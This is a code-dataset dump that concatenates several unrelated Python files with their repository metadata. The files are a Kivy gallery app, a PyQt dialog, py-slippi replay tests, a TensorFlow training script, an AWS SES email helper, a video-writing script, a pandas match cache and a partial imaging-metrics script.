        self.screen1 = MyNewGallery(name="screen1")
        screen2 = MenuB(name="screen2")
        # Gallery -> menu button, pinned to the right edge.
        btn_to_screen2 = Button(text="to screen 2",
                                size_hint = (None, None),
                                size = (100,100),
                                pos_hint = {"right": 1})
        btn_to_screen2.bind(on_press=self.to_b)
        self.screen1.add_widget(btn_to_screen2)
        # Menu -> gallery button, pinned to the left edge.
        btn_to_gallery = Button(text="to gallery",
                                size_hint=(None, None),
                                size=(100, 100),
                                pos_hint={"left": 1})
        btn_to_gallery.bind(on_press=self.to_gallery)
        screen2.add_widget(btn_to_gallery)
        self.add_widget(self.screen1)
        self.add_widget(screen2)

    def to_b(self, *args):
        # Navigate to the menu screen, sliding left.
        self.transition.direction = "left"
        self.current = "screen2"

    def to_gallery(self, *args):
        # Navigate back to the gallery, sliding right, and re-scan the folder.
        self.transition.direction = "right"
        self.current = "screen1"
        self.screen1.refresh_gallery()
class RefreshGalleryApp(App):
    """App entry point; fixes the window to a portrait, phone-like size."""

    def build(self):
        # 350x700 approximates a phone screen in portrait orientation.
        Window.size = (350,700)
        return MyScreenManager()
RefreshGalleryApp().run() | petchorine/double_view | swipebtn_refresh_gallery.py | swipebtn_refresh_gallery.py | py | 2,874 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "kivy.uix.image.Image",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "kivy.metrics.dp",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "kivy.uix.screenmanager.Screen",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "ki... |
16391999279 | from PyQt5.QtWidgets import QWidget, QVBoxLayout, QLabel, QPushButton
from pizza.controller.ControllorePizza import ControllorePizza
class VistaEliminaPizza(QWidget):
    """Confirmation view asking whether to delete a given pizza."""

    def __init__(self, pizza, elimina_pizza, elimina_callback, parent=None):
        super(VistaEliminaPizza, self).__init__(parent)
        self.controllore = ControllorePizza(pizza)
        self.elimina_pizza = elimina_pizza
        self.elimina_callback = elimina_callback

        layout = QVBoxLayout()

        # Question label, enlarged for readability.
        question = QLabel("Vuoi eliminare la pizza " + pizza.nome + "?")
        question_font = question.font()
        question_font.setPointSize(18)
        question.setFont(question_font)
        layout.addWidget(question)

        # Confirmation button triggers the deletion flow.
        confirm_button = QPushButton("Elimina")
        confirm_button.clicked.connect(self.elimina)
        layout.addWidget(confirm_button)

        self.setLayout(layout)
        self.resize(150, 300)
        self.setWindowTitle("Elimina pizza")

    def elimina(self):
        """Run the deletion, notify the caller, then close this view."""
        self.elimina_pizza()
        self.elimina_callback()
        self.close()
| CappeXII/ing_software | pizza/view/VistaEliminaPizza.py | VistaEliminaPizza.py | py | 1,018 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "PyQt5.QtWidgets.QWidget",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "pizza.controller.ControllorePizza.ControllorePizza",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "pizza.controller.ControllorePizza",
"line_number": 9,
"usage_typ... |
38597169357 | #!/usr/bin/python3
import datetime, glob, os, subprocess, unittest
from slippi import Game, parse
from slippi.id import CSSCharacter, InGameCharacter, Item, Stage
from slippi.log import log
from slippi.metadata import Metadata
from slippi.event import Buttons, Direction, End, Frame, Position, Start, Triggers, Velocity
from slippi.parse import ParseEvent
BPhys = Buttons.Physical
BLog = Buttons.Logical
def norm(f):
    """Clamp an analog value to -1, 0, or +1 with a +/-0.01 dead zone."""
    if f > 0.01:
        return 1
    if f < -0.01:
        return -1
    return 0
def path(name):
    """Return the path of replay `name` in the replays dir next to this file."""
    replay_dir = os.path.dirname(__file__)
    return os.path.join(replay_dir, "replays", f"{name}.slp")
class TestGame(unittest.TestCase):
def __init__(self, *args, **kwargs) -> None:
self.pkgname: str = "slippi"
super().__init__(*args, **kwargs)
my_env = os.environ.copy()
self.pypath: str = my_env.get("PYTHONPATH", os.getcwd())
self.mypy_opts: List[str] = ['--ignore-missing-imports']
def _game(self, name):
return Game(path(name))
def _stick_seq(self, game):
pass
# not used yet because the recorder currently puts bogus values in triggers.physical
def _trigger_seq(self, game):
last_triggers = None
trigger_seq = []
for frame in game.frames:
t = frame.ports[0].leader.pre.triggers
t = Triggers(norm(t.logical), norm(t.physical.l), norm(t.physical.r))
if (t.logical or t.physical.l or t.physical.r) and t != last_triggers:
trigger_seq.append(t)
last_triggers = t
return trigger_seq
def _button_seq(self, game):
last_buttons = None
button_seq = []
for frame in game.frames:
b = frame.ports[0].leader.pre.buttons
if (b.logical or b.physical) and b != last_buttons:
button_seq.append(b)
last_buttons = b
return button_seq
def test_run_mypy_module(self):
"""Run mypy on all module sources"""
mypy_call: List[str] = ["mypy"] + self.mypy_opts + ["-p", self.pkgname]
browse_result: int = subprocess.call(mypy_call, env=os.environ, cwd=self.pypath)
self.assertEqual(browse_result, 0, 'mypy on slippi')
def test_run_mypy_tests(self):
"""Run mypy on all tests in module under the tests directory"""
for test_file in glob.iglob(f'{os.getcwd()}/tests/*.py'):
mypy_call: List[str] = ["mypy"] + self.mypy_opts + [test_file]
test_result: int = subprocess.call(mypy_call, env=os.environ, cwd=self.pypath)
self.assertEqual(test_result, 0, f'mypy on test {test_file}')
def test_slippi_old_version(self):
game = self._game('v0.1')
self.assertEqual(game.start.slippi.version, Start.Slippi.Version(0,1,0,0))
self.assertEqual(game.metadata.duration, None)
self.assertEqual(game.metadata.players, (None, None, None, None))
self.assertEqual(game.start.players[0].character, CSSCharacter.FOX)
self.assertEqual(game.start.players[1].character, CSSCharacter.GANONDORF)
def test_game(self):
game = self._game('game')
self.assertEqual(game.metadata, Metadata._parse({
'startAt': '2018-06-22T07:52:59Z',
'lastFrame': 5085,
'playedOn': 'dolphin',
'players': {
'0': {'characters': {InGameCharacter.MARTH: 5209}},
'1': {'characters': {InGameCharacter.FOX: 5209}}}}))
self.assertEqual(game.metadata, Metadata(
date=datetime.datetime(2018, 6, 22, 7, 52, 59, 0, datetime.timezone.utc),
duration=5209,
platform=Metadata.Platform.DOLPHIN,
players=(
Metadata.Player({InGameCharacter.MARTH: 5209}),
Metadata.Player({InGameCharacter.FOX: 5209}),
None, None)))
self.assertEqual(game.start, Start(
is_teams=False,
random_seed=3803194226,
slippi=Start.Slippi(Start.Slippi.Version(1,0,0,0)),
stage=Stage.YOSHIS_STORY,
players=(
Start.Player(character=CSSCharacter.MARTH, type=Start.Player.Type.HUMAN, stocks=4, costume=3, team=None, ucf=Start.Player.UCF(False, False)),
Start.Player(character=CSSCharacter.FOX, type=Start.Player.Type.CPU, stocks=4, costume=0, team=None, ucf=Start.Player.UCF(False, False)),
None, None)))
self.assertEqual(game.end, End(End.Method.CONCLUSIVE))
self.assertEqual(game.metadata.duration, len(game.frames))
def test_game_skip_frames(self):
game = Game(path('game'), skip_frames=True)
self.assertEqual(game.metadata, Metadata._parse({
'startAt': '2018-06-22T07:52:59Z',
'lastFrame': 5085,
'playedOn': 'dolphin',
'players': {
'0': {'characters': {InGameCharacter.MARTH: 5209}},
'1': {'characters': {InGameCharacter.FOX: 5209}}}}))
self.assertEqual(game.metadata, Metadata(
date=datetime.datetime(2018, 6, 22, 7, 52, 59, 0, datetime.timezone.utc),
duration=5209,
platform=Metadata.Platform.DOLPHIN,
players=(
Metadata.Player({InGameCharacter.MARTH: 5209}),
Metadata.Player({InGameCharacter.FOX: 5209}),
None, None)))
self.assertEqual(game.start, Start(
is_teams=False,
random_seed=3803194226,
slippi=Start.Slippi(Start.Slippi.Version(1,0,0,0)),
stage=Stage.YOSHIS_STORY,
players=(
Start.Player(character=CSSCharacter.MARTH, type=Start.Player.Type.HUMAN, stocks=4, costume=3, team=None, ucf=Start.Player.UCF(False, False)),
Start.Player(character=CSSCharacter.FOX, type=Start.Player.Type.CPU, stocks=4, costume=0, team=None, ucf=Start.Player.UCF(False, False)),
None, None)))
self.assertEqual(game.end, End(End.Method.CONCLUSIVE))
self.assertFalse(game.frames)
def test_ics(self):
game = self._game('ics')
self.assertEqual(game.metadata.players[0].characters, {
InGameCharacter.NANA: 344,
InGameCharacter.POPO: 344})
self.assertEqual(game.start.players[0].character, CSSCharacter.ICE_CLIMBERS)
self.assertIsNotNone(game.frames[0].ports[0].follower)
def test_ucf(self):
self.assertEqual(self._game('shield_drop').start.players[0].ucf, Start.Player.UCF(dash_back=False, shield_drop=True))
self.assertEqual(self._game('dash_back').start.players[0].ucf, Start.Player.UCF(dash_back=True, shield_drop=False))
def test_buttons_lrzs(self):
game = self._game('buttons_lrzs')
self.assertEqual(self._button_seq(game), [
Buttons(BLog.TRIGGER_ANALOG, BPhys.NONE),
Buttons(BLog.TRIGGER_ANALOG|BLog.L, BPhys.L),
Buttons(BLog.TRIGGER_ANALOG, BPhys.NONE),
Buttons(BLog.TRIGGER_ANALOG|BLog.R, BPhys.R),
Buttons(BLog.TRIGGER_ANALOG|BLog.A|BLog.Z, BPhys.Z),
Buttons(BLog.START, BPhys.START)])
def test_buttons_abxy(self):
game = self._game('buttons_abxy')
self.assertEqual(self._button_seq(game), [
Buttons(BLog.A, BPhys.A),
Buttons(BLog.B, BPhys.B),
Buttons(BLog.X, BPhys.X),
Buttons(BLog.Y, BPhys.Y)])
def test_dpad_udlr(self):
game = self._game('dpad_udlr')
self.assertEqual(self._button_seq(game), [
Buttons(BLog.DPAD_UP, BPhys.DPAD_UP),
Buttons(BLog.DPAD_DOWN, BPhys.DPAD_DOWN),
Buttons(BLog.DPAD_LEFT, BPhys.DPAD_LEFT),
Buttons(BLog.DPAD_RIGHT, BPhys.DPAD_RIGHT)])
def test_cstick_udlr(self):
game = self._game('cstick_udlr')
self.assertEqual(self._button_seq(game), [
Buttons(BLog.CSTICK_UP, BPhys.NONE),
Buttons(BLog.CSTICK_DOWN, BPhys.NONE),
Buttons(BLog.CSTICK_LEFT, BPhys.NONE),
Buttons(BLog.CSTICK_RIGHT, BPhys.NONE)])
def test_joystick_udlr(self):
game = self._game('joystick_udlr')
self.assertEqual(self._button_seq(game), [
Buttons(BLog.JOYSTICK_UP, BPhys.NONE),
Buttons(BLog.JOYSTICK_DOWN, BPhys.NONE),
Buttons(BLog.JOYSTICK_LEFT, BPhys.NONE),
Buttons(BLog.JOYSTICK_RIGHT, BPhys.NONE)])
def test_nintendont(self):
game = self._game('nintendont')
self.assertEqual(game.metadata.platform, Metadata.Platform.NINTENDONT)
def test_netplay_name(self):
game = self._game('netplay')
players = game.metadata.players
self.assertEqual(players[0].netplay, Metadata.Player.Netplay(code='ABCD#123', name='abcdefghijk'))
self.assertEqual(players[1].netplay, Metadata.Player.Netplay(code='XX#000', name='nobody'))
def test_console_name(self):
game = self._game('console_name')
self.assertEqual(game.metadata.console_name, 'Station 1')
def test_metadata_json(self):
game = self._game('game')
self.assertEqual(game.metadata_raw, {
'lastFrame': 5085,
'playedOn': 'dolphin',
'players': {
'0': {'characters': {'18': 5209}},
'1': {'characters': {'1': 5209}}},
'startAt': '2018-06-22T07:52:59Z'})
def test_v2(self):
game = self._game('v2.0')
self.assertEqual(game.start.slippi.version, Start.Slippi.Version(2,0,1))
def test_unknown_event(self):
with self.assertLogs(log, 'INFO') as log_context:
game = self._game('unknown_event')
self.assertEqual(log_context.output, ['INFO:root:ignoring unknown event type: 0xff'])
def test_items(self):
game = self._game('items')
items = {}
for f in game.frames:
for i in f.items:
if not i.spawn_id in items:
items[i.spawn_id] = i
self.assertEqual(items, {
0: Frame.Item(
damage=0,
direction=Direction.RIGHT,
position=Position(-62.7096061706543, -1.4932749271392822),
spawn_id=0,
state=0,
timer=140.0,
type=Item.PEACH_TURNIP,
velocity=Velocity(0.0, 0.0)),
1: Frame.Item(
damage=0,
direction=Direction.LEFT,
position=Position(20.395559310913086, -1.4932749271392822),
spawn_id=1,
state=0,
timer=140.0,
type=Item.PEACH_TURNIP,
velocity=Velocity(0.0, 0.0)),
2: Frame.Item(
damage=0,
direction=Direction.RIGHT,
position=Position(-3.982539176940918, -1.4932749271392822),
spawn_id=2,
state=0,
timer=140.0,
type=Item.PEACH_TURNIP,
velocity=Velocity(0.0, 0.0))})
class TestParse(unittest.TestCase):
    """Tests for the event-driven `slippi.parse` entry point."""

    def test_parse(self):
        """Parsing with a METADATA handler should deliver the parsed metadata."""
        metadata = None
        def set_metadata(x):
            # Closure captures the metadata object for the assertion below.
            nonlocal metadata
            metadata = x
        parse(path('game'), {ParseEvent.METADATA: set_metadata})
        self.assertEqual(metadata.duration, 5209)
if __name__ == '__main__':
unittest.main()
| hohav/py-slippi | test/replays.py | replays.py | py | 11,337 | python | en | code | 54 | github-code | 1 | [
{
"api_name": "slippi.event.Buttons.Physical",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "slippi.event.Buttons",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "slippi.event.Buttons.Logical",
"line_number": 14,
"usage_type": "attribute"
},
... |
5875820973 | import gc
import numpy as np
import pandas as pd
import tensorflow as tf
import os
import cv2
import matplotlib.pyplot as plt
import matplotlib as mpl
mpl.style.use("seaborn-v0_8")
from tqdm import tqdm
# pathlib to my loccal file
files = os.listdir("/home/michael/Desktop/archive/dataset/")
files
# initialisation of array
image_array = [] # it's a list later i will convert it to array
label_array = []
path = "/home/michael/Desktop/archive/dataset/"
# loop through each sub-folder in train data
for i in range(len(files)):
# files in sub-folder
file_sub = os.listdir(path + files[i])
for k in tqdm(range(len(file_sub))):
try:
img = cv2.imread(path + files[i] + "/" + file_sub[k])
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
img = cv2.resize(img, (96, 96))
image_array.append(img)
label_array.append(i)
except:
pass
# collect garbage to free memory after loading images
gc.collect()
# importing process utils
import psutil
print(psutil.virtual_memory())
# image arrays
image_array = np.array(image_array) / 255.0
label_array = np.array(label_array)
# importing sckit data
from sklearn.model_selection import train_test_split
X_train, X_test, Y_train, Y_test = train_test_split(image_array, label_array, test_size=0.15)
from keras import layers, callbacks, utils, applications, optimizers
from keras.models import Sequential, Model, load_model
# checking file length
len(files)
model = Sequential()
# I will use MobileNetV2 as an pretrained model
pretrained_model = tf.keras.applications.EfficientNetB0(input_shape=(96, 96, 3), include_top=False,
weights="imagenet")
model.add(pretrained_model)
model.add(layers.GlobalAveragePooling2D())
# add dropout to increase accuracy by not overfitting
model.add(layers.Dropout(0.3))
# add dense layer as final output
model.add(layers.Dense(1))
model.summary()
# compile the model with optimizer, loss, and metrics
model.compile(optimizer="adam", loss="mean_squared_error", metrics=["mae"])
# creating a chechpoint to save model at best accuarcy
ckp_path = "trained_model/model"
model_checkpoint = tf.keras.callbacks.ModelCheckpoint(filepath=ckp_path,
monitor="val_mae",
mode="auto",
save_best_only=True,
save_weights_only=True)
# create a lr reducer which decrease learning rate when accuarcy does not increase
reduce_lr = tf.keras.callbacks.ReduceLROnPlateau(factor=0.9, monitor="val_mae",
mode="auto", cooldown=0,
patience=5, verbose=1, min_lr=1e-6)
# patience : wait till 5 epoch
# verbose : show accuracy every 1 epoch
# min_lr=minimum learning rate
# model train_test_split
EPOCHS = 300
BATCH_SIZE = 64
history = model.fit(X_train,
Y_train,
validation_data=(X_test, Y_test),
batch_size=BATCH_SIZE,
epochs=EPOCHS,
callbacks=[model_checkpoint, reduce_lr]
)
model.load_weights(ckp_path)
# converting
converter = tf.lite.TFLiteConverter.from_keras_model(model)
tflite_model = converter.convert()
# Save the model.
with open('model.tflite', 'wb') as f:
f.write(tflite_model)
prediction_val = model.predict(X_test, batch_size=BATCH_SIZE)
# inspect the first predictions
prediction_val[:20]
Y_test[:20]
def print_hi(name):
    """Print a short greeting for *name* (PyCharm sample entry point)."""
    greeting = f'Hi, {name}'
    # Set a breakpoint on the next line to try the debugger (Ctrl+F8).
    print(greeting)
# Run the script via the green gutter button or `python main.py`.
if __name__ == '__main__':
    print_hi('hey am coding using python')
# See PyCharm help at https://www.jetbrains.com/help/pycharm/
| Bpdum/face_recogntion_tfModel_android_pycharm | main.py | main.py | py | 3,914 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "matplotlib.style.use",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "matplotlib.style",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "os.listdir",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "os.listdir",
... |
73501419235 | import logging
import boto3
class SESService():
    """Thin wrapper around the AWS SES client for interview-application e-mails."""
    def __init__(self):
        # SECURITY: never commit real AWS credentials to source control.
        # These placeholder strings must be replaced (ideally the client
        # should read credentials from the environment / IAM role instead).
        self.client = boto3.client(
            'ses',
            aws_access_key_id="INPUT YOUR ACESS KEY FROM AWS",
            aws_secret_access_key="INPUT YOUR SECRET ACESS KEY FROM AWS",
            region_name="INPUT YOUR REGION",
        )
    @staticmethod
    def __verify_status(*email):
        """Select the message body from the optional status in *email*.

        email[0] is the recipient address; email[1], if present, is the
        application status ('Approved' / 'Rejected').  Any other status —
        or no status at all — yields the neutral "application received"
        text.  (The original duplicated the len(email) > 1 check; a
        lookup table expresses the same mapping once.)
        """
        messages = {
            'Approved': 'We are happy to inform you that your application was approved',
            'Rejected': 'We regret to inform you that your application was rejected',
        }
        application = 'Thank you for applying. We will get back to you as soon as possible!'
        if len(email) > 1:
            return messages.get(email[1], application)
        return application
    def send_email(self, *email):
        """Send the status e-mail to email[0] via SES and log the response.

        Returns None; the SES response dict is only logged.
        """
        message = self.__verify_status(*email)
        response = self.client.send_email(
            Source='bignightmare1@gmail.com',
            Destination={
                'ToAddresses': [
                    email[0],
                ],
            },
            Message={
                'Subject': {
                    'Data': f'Welcome to Interview Management System {email[0]}!',
                    'Charset': 'UTF-8'
                },
                'Body': {
                    'Text': {
                        'Data': f'{message}',
                        'Charset': 'UTF-8'
                    }
                }
            },
        )
        # Lazy %-style args keep formatting cost out of disabled log levels.
        logging.info('Email sent %s', response)
| vmakksimov/IM_System | services/ses.py | ses.py | py | 1,630 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "boto3.client",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 51,
"usage_type": "call"
}
] |
29835250163 | import cv2
from cv2 import VideoWriter_fourcc
import os
import numpy as np
from tqdm import tqdm
import skvideo.io
import argparse
if __name__ == '__main__':
    parser = argparse.ArgumentParser(
        description='create videos based on images')
    # BUGFIX: both help texts were copy-pasted ("output result file in
    # pickle format"); they now describe the actual arguments.
    parser.add_argument('--img_path', '-in',
                        help='directory containing the input image frames')
    parser.add_argument('--video_path', '-out',
                        help='path of the output video file (e.g. out.mp4)')
    args = parser.parse_args()
    img_dir = args.img_path
    savepath = args.video_path
    # Ensure the output directory exists.  makedirs(exist_ok=True) already
    # tolerates a pre-existing directory, so the separate exists() check
    # was redundant; the empty-dirname guard avoids makedirs('') failing
    # when savepath has no directory component.
    out_dir = os.path.split(savepath)[0]
    if out_dir:
        os.makedirs(out_dir, exist_ok=True)
    video_fps = 10
    frame_w, frame_h = 1200, 800  # output frame size (width x height)
    video_writer = skvideo.io.FFmpegWriter(
        savepath,
        inputdict={
            '-r': str(video_fps),
            '-s': '{}x{}'.format(frame_w, frame_h)
        },
        outputdict={
            '-r': str(video_fps),
            '-vcodec': 'libx264'
        })
    # Frames are written in lexicographic filename order.
    for name in tqdm(sorted(os.listdir(img_dir))):
        image = cv2.imread(os.path.join(img_dir, name))
        image = cv2.resize(image, (frame_w, frame_h), interpolation=cv2.INTER_NEAREST)
        # OpenCV reads BGR; FFmpegWriter expects RGB.
        image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
        video_writer.writeFrame(image)
    video_writer.close()
| jjw-DL/Code_Analysis | detr4d/internal_code/create_video.py | create_video.py | py | 1,693 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "os.path.exists",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 24,
"usage_type": "attribute"
},
{
"api_name": "os.path.split",
... |
74138069153 | import logging
from enum import Enum
from typing import Optional
import pandas as pd
from pandas import DataFrame
import config
from asseeibot import runtime_variables
from asseeibot.models.cache import Cache
from asseeibot.models.fuzzy_match import FuzzyMatch, MatchBasedOn
from asseeibot.models.ontology_dataframe import OntologyDataframeColumn
from asseeibot.models.wikimedia.wikidata.entity import EntityId
logger = logging.getLogger(__name__)
# This code is adapted from https://github.com/dpriskorn/WikidataMLSuggester and LexUtils
# lookups where inspired by
# https://stackoverflow.com/questions/24761133/pandas-check-if-row-exists-with-certain-values
class CacheDataframeColumn(Enum):
    """Column names of the on-disk match-cache DataFrame."""
    QID = "qid"
    CROSSREF_SUBJECT = "crossref_subject"
    MATCH_BASED_ON = "match_based_on"
    SPLIT_SUBJECT = "split_subject"
    ORIGINAL_SUBJECT = "original_subject"
class MatchCache(Cache):
    """Pickle-backed cache of Crossref subject -> Wikidata QID matches.

    The cache lives in a pandas DataFrame (columns: see
    CacheDataframeColumn) that the Cache base class loads from and saves
    to disk via the configured pickle file.
    """
    # Lookup-state flags; None means "not looked up yet".
    crossref_subject_found: bool = None
    dataframe: DataFrame = None
    qid_dropped: bool = None
    qid_found: bool = None
    pickle: str = config.cache_pickle_filename
    class Config:
        # Because of DataFrame
        arbitrary_types_allowed = True
    def __check_variables__(self):
        """Raise ValueError if any attribute required for caching is missing."""
        logger.debug("Checking variables")
        if self.match.qid is None:
            raise ValueError("match.qid was None")
        if self.match.original_subject is None:
            raise ValueError("match.original_subject was None")
        if self.match.crossref_subject is None:
            raise ValueError("match.crossref_subject was None")
        if self.match.split_subject is None:
            raise ValueError("match.split_subject was None")
        if self.match.match_based_on is None:
            raise ValueError("match.match_based_on was None")
    def __append_new_match_to_the_dataframe__(self):
        """Append the current match as a new row of the cache DataFrame."""
        self.__check_variables__()
        logger.debug("Adding to cache")
        data = {
            CacheDataframeColumn.QID.value: self.match.qid.value,
            CacheDataframeColumn.CROSSREF_SUBJECT.value: self.match.crossref_subject,
            CacheDataframeColumn.MATCH_BASED_ON.value: self.match.match_based_on.value,
            CacheDataframeColumn.ORIGINAL_SUBJECT.value: self.match.original_subject,
            CacheDataframeColumn.SPLIT_SUBJECT.value: self.match.split_subject,
        }
        if self.dataframe is None:
            self.dataframe = pd.DataFrame(data=[data])
        else:
            # BUGFIX: DataFrame.append() was deprecated in pandas 1.4 and
            # removed in 2.0; pd.concat is the supported replacement.
            # Index labels are deliberately not reset (matching append's
            # default) because __extract_match__ indexes rows by label 0.
            self.dataframe = pd.concat(
                [self.dataframe, pd.DataFrame(data=[data])])
    def __check_crossref_subject__(self):
        """Validate that the match has a usable crossref subject."""
        if self.match.crossref_subject is None:
            raise ValueError("crossref_subject was None")
        if self.match.crossref_subject == "":
            raise ValueError("crossref_subject was empty string")
    def __check_qid__(self):
        """Validate that the match has a QID."""
        if self.match.qid is None:
            raise ValueError("qid was None")
    def __check_if_drop_was_successful__(self):
        """Debug helper (currently unused) that logs whether the QID is still cached."""
        if config.loglevel == logging.DEBUG:
            logging.debug("Checking if the qid is still in the cache")
            match = (self.dataframe[CacheDataframeColumn.QID.value] == self.match.qid.value).any()
            logger.debug(f"match:{match}")
            # NOTE(review): DataFrame.info() prints its report and returns
            # None, so this additionally prints "None".
            print(self.dataframe.info())
            logger.debug(f"Saving pickle without {self.match.qid.value}")
    def __drop_qid_from_dataframe__(self):
        """Remove every row whose QID equals the current match's QID."""
        self.__read_dataframe_from_disk__()
        # This tests whether any row matches
        match = (self.dataframe[CacheDataframeColumn.QID.value] == self.match.qid.value).any()
        logger.debug(f"match:{match}")
        if match:
            logger.debug("Deleting the item from the cache now")
            self.dataframe = self.dataframe[self.dataframe[CacheDataframeColumn.QID.value] != self.match.qid.value]
            self.qid_dropped = True
        else:
            self.qid_dropped = False
    def __extract_match__(self):
        """Rebuild self.match (a FuzzyMatch) from the cached row for the
        current crossref subject, enriching it with label/description/alias
        from the in-memory ontology dataframe."""
        logger.info("Extracting match from cache")
        found_match = self.dataframe.loc[
            self.dataframe[CacheDataframeColumn.CROSSREF_SUBJECT.value] == self.match.crossref_subject].any()
        logger.debug(f"result:{found_match}")
        # NOTE(review): found_match is a pandas Series, so this check is
        # always true; read() already guards via crossref_subject_found.
        if found_match is not None:
            logger.info("Already matched QID found in the cache")
            row: DataFrame = self.dataframe[
                self.dataframe[CacheDataframeColumn.CROSSREF_SUBJECT.value] == self.match.crossref_subject
                ]
            if isinstance(row, DataFrame):
                qid: EntityId = EntityId(row[CacheDataframeColumn.QID.value][0])
                original_subject: str = row[CacheDataframeColumn.ORIGINAL_SUBJECT.value][0]
                # BUGFIX: this previously read the ORIGINAL_SUBJECT column,
                # so the reconstructed match carried the wrong subject.
                crossref_subject: str = row[CacheDataframeColumn.CROSSREF_SUBJECT.value][0]
                match_based_on = MatchBasedOn(row[CacheDataframeColumn.MATCH_BASED_ON.value][0])
                split_subject: bool = bool(row[CacheDataframeColumn.SPLIT_SUBJECT.value][0])
                ontology_dataframe = runtime_variables.ontology_dataframe
                label = ontology_dataframe.loc[
                    ontology_dataframe[OntologyDataframeColumn.ITEM.value] == qid.url(),
                    OntologyDataframeColumn.LABEL.value].head(1).values[0]
                description = ontology_dataframe.loc[
                    ontology_dataframe[OntologyDataframeColumn.ITEM.value] == qid.url(),
                    OntologyDataframeColumn.DESCRIPTION.value].head(1).values[0]
                alias = ontology_dataframe.loc[
                    ontology_dataframe[OntologyDataframeColumn.ITEM.value] == qid.url(),
                    OntologyDataframeColumn.ALIAS.value].head(1).values[0]
                if label is None:
                    raise ValueError("label was None")
                self.match = FuzzyMatch(
                    qid=qid,
                    original_subject=original_subject,
                    match_based_on=match_based_on,
                    split_subject=split_subject,
                    crossref_subject=crossref_subject,
                    alias=alias,
                    label=label,
                    description=description,
                )
            else:
                logger.error("Did not get pandas dataframe, got")
                print(row)
                exit()
    def __lookup_crossref_subject__(self):
        """Populate crossref_subject_found from the current DataFrame."""
        if len(self.dataframe) > 0:
            match = (self.dataframe[CacheDataframeColumn.CROSSREF_SUBJECT.value] == self.match.crossref_subject).any()
            logger.debug(f"match:{match}")
            self.crossref_subject_found = match
        else:
            self.crossref_subject_found = False
    def __lookup_qid__(self):
        """Populate qid_found from the current DataFrame."""
        match = (self.dataframe[CacheDataframeColumn.QID.value] == self.match.qid.value).any()
        logger.debug(f"match:{match}")
        self.qid_found = match
    def read(self) -> Optional[FuzzyMatch]:
        """Returns None or result from the cache"""
        self.__check_crossref_subject__()
        self.__verify_that_the_cache_file_exists_and_read__()
        self.__lookup_crossref_subject__()
        if self.crossref_subject_found:
            self.__extract_match__()
            return self.match
    def add(self) -> bool:
        """Add a match to the cache
        It returns True if it was added and False if either QID
        or the crossref subject was found in the cache.
        :return: bool"""
        self.__check_crossref_subject__()
        self.__check_qid__()
        self.__verify_that_the_cache_file_exists_and_read__()
        self.__lookup_crossref_subject__()
        # BUGFIX: qid_found was never populated (stayed None), making the
        # QID half of the check below a no-op; look it up explicitly so
        # the documented contract holds.
        self.__lookup_qid__()
        if not self.crossref_subject_found and not self.qid_found:
            self.__append_new_match_to_the_dataframe__()
            self.__save_dataframe_to_disk__()
            return True
        else:
            return False
    def delete(self) -> bool:
        """Delete from the cache.
        Returns True if success and False if not found"""
        self.__check_qid__()
        logger.debug("Deleting from the cache")
        self.__verify_that_the_cache_file_exists_and_read__()
        self.__drop_qid_from_dataframe__()
        if self.qid_dropped:
            self.__save_dataframe_to_disk__()
            return True
        else:
            return False
| dpriskorn/asseeibot | asseeibot/models/match_cache.py | match_cache.py | py | 8,581 | python | en | code | 3 | github-code | 1 | [
{
"api_name": "logging.getLogger",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "enum.Enum",
"line_number": 24,
"usage_type": "name"
},
{
"api_name": "asseeibot.models.cache.Cache",
"line_number": 32,
"usage_type": "name"
},
{
"api_name": "pandas.DataF... |
73934613795 | import numpy as np
import cv2
import nibabel as nib
import os
import yaml
from pytorch_fid import fid_score
#from pytorch_lightning import metrics
import argparse
parser = argparse.ArgumentParser(description='Metrics Script')
parser.add_argument('--bodymask_path', type=str)
parser.add_argument('--real_slices_path', type=str)
parser.add_argument('--fake_slices_path', type=str)
parser.add_argument('--results_path', type=str, default='./metrics_result.yaml')
parser.add_argument('--FID', action='store_true')
parser.add_argument('--debug_images', action='store_true')
args = parser.parse_args()
def build_volume(slices, patient):
    """Stack a patient's 2-D slices into a (H, W, D) volume.

    Parameters
    ----------
    slices : dict[str, np.ndarray]
        Maps slice filename -> image array, either H x W or H x W x C
        (only channel 0 of color images is used).
    patient : str
        Patient identifier; all slices whose filename starts with it are
        stacked, in sorted-filename order.

    Returns
    -------
    np.ndarray of shape (H, W, number of matching slices).
    """
    # startswith() generalizes the original `s[:4] == patient`, which
    # silently assumed 4-character patient IDs (identical for the
    # 'PAT1'/'PAT3' IDs actually used).
    keys = sorted(k for k in slices if k.startswith(patient))
    first = slices[keys[0]]
    # BUGFIX: the second dimension was first.shape[0] (height) twice,
    # which only worked for square slices; use the real width.
    volume = np.zeros((first.shape[0], first.shape[1], len(keys)))
    for i, key in enumerate(keys):
        img = slices[key]
        # Color images contribute a single channel, as in the original.
        volume[:, :, i] = img if img.ndim == 2 else img[:, :, 0]
    return volume
def read_slices(path):
    """Load every slice image in *path* into a dict keyed by filename.

    .png files are read with OpenCV (BGR layout, as stored); .nii files
    are read with nibabel and cast to int16.  Anything else is reported
    and skipped.
    """
    # assume folder is for one patient
    filelist = os.listdir(path)
    imglist = {}
    for f in filelist:
        if f[-4:] == '.png':
            imglist[f] = cv2.imread(os.path.join(path, f))
        elif f[-4:] == '.nii':
            A_img_nifti = nib.load(os.path.join(path, f))
            # caching="unchanged" avoids nibabel keeping an extra copy.
